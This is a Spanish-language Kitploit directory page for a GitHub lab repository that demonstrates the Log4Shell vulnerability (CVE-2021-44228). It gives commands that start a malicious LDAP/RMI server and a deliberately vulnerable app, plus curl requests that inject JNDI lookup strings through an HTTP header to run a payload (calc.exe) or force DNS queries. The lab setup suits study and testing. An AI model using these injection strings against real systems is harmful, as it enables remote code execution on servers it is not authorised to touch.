Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-cve-2021-44228 — Ejemplos de Log4j CVE-2021-44228: Ejecución remota de código (a través de LDAP, RMI, ...), Consultas DNS forzadas, ... | Kitploit
Herramientas/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Ejemplos de Log4j CVE-2021-44228: Ejecución remota de código (a través de LDAP, RMI, ...), Consultas DNS forzadas, ...

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
51hace 4 añosAún no revisado

Log4j CVE-2021-44228 y CVE-2021-45046

Requisitos

Use un JDK vulnerable, por ejemplo JDK 1.8.0_181

Uso

Servidor malicioso

El servidor malicioso despliega los siguientes endpoints:

  • 1389 servidor LDAP
  • 1099 servidor RMI
  • 8081 servidor HTTP
root@kitploit:~
./gradlew :malicious-server:bootRun

Aplicación vulnerable

La aplicación vulnerable despliega un endpoint HTTP en 8082

root@kitploit:~
./gradlew :vulnerable-app:bootRun

Ejecución Remota de Código

Elija un payload que será ejecutado por la aplicación vulnerable y codifíquelo en Base64. Como ejemplo, para abrir la calculadora en Windows: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

Consultas DNS

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
Descargar herramienta